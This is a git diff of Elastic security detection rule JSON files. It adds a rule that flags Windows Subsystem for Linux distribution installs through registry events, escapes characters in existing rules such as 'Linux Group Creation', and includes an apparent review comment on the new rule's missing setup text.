@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to the registry that indicates the install of a new Windows Subsystem for Linux distribution by name. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Distribution Installed", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Distribution Installed\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies the installation of a new Windows Subsystem for Linux distribution via registry events.\n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine which distribution was installed. Some distributions such as Kali Linux can facilitate the compromise of the environment.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. 
Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and the WSL distribution is homologated and approved in the environment.\n\n### Related Rules\n\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Windows Subsystem for Linux Enabled via Dism Utility - e2e0537d-7d8f-4910-a11d-559bcf61295a\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : \n (\"HK*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\",\n \"\\\\REGISTRY\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1699af0-8e1e-4ed0-8ec1-89783538a061", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + 
"version": 5 + }, + "id": "a1699af0-8e1e-4ed0-8ec1-89783538a061_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json index 5b14fc6b023..87bfa580c04 100644 --- a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json index 09c8fb49a2a..807423583b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json index 15de158feb1..dda101f2238 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json 
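Review bot: The new rule has no `setup` field although it is an EQL rule with `"timestamp_override": "event.ingested"` that also targets beats-style indices (`winlogbeat-*`, `logs-windows.*`); the sibling EQL rules in this same changeset (the a16612dd and a1a0375f hunks) ship a `setup` string explaining that on a non-elastic-agent index before 8.2 `event.ingested` is not populated and a custom ingest pipeline must copy `@timestamp` into it, and without that text here an operator on such an index gets a rule that silently never matches. Adding the same one-line `setup` string used in the a1a0375f rules would keep the guidance consistent across the package. The query constrains only `host.os.type` and `registry.path`, with no `event.type` or `event.action` filter, so if any of the listed sources also reports removal of the `PackageFamilyName` value under that path, an uninstall would be surfaced under the "Installed" title; that is worth confirming against the Defend, Endgame and Sysmon registry event types and, if it holds, excluding `event.type == "deletion"`. The investigation step "Examine which distribution was installed" could also tell the analyst where to look, since the matched value's data (presumably `registry.data.strings`) is what names the distribution.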
@@ -64,7 +64,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json
index 375257ae2d9..29cfabc4340 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json
index 2600b6d98a5..53cb8414d0f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json
index 4614e5f5215..4ef2eabb3ee 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json
index cbbb3cf3c01..9d3f82c6485 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json
index 0b195183b12..8d61e0dbb2e 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json
index 5a520ec0273..bd1f4057a9d 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Group Creation", - "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"group\" and event.type == \"creation\") and\nprocess.name in (\"groupadd\", \"addgroup\") and group.name != null\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json
index 7e3d7e0a793..723ba6478c1 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Group Creation", - "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"group\" and event.type == \"creation\") and\nprocess.name in (\"groupadd\", \"addgroup\") and group.name != null\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json
index 888ef85eef7..bd03b11775f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json
index 861d4644218..711cb9412ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
